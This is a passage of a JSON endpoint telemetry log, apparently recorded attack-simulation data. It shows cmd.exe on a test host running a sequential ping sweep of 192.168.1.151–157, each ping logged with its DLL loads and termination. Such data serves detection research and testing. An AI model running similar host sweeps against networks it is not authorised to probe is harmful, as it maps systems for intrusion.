"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2388, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717300000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717300000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717300000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "process", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572721830000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.151", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6428, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "process", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572726840000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.152", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6132, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572726980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "process", - 
"pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572731990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.153", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - 
"unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "process", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572736830000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.154", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": 
"{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "process", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572741990000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.155", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "process", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572746830000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.156", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6236, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572746980000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "event_type": "process", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572751990000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.157", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4236, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
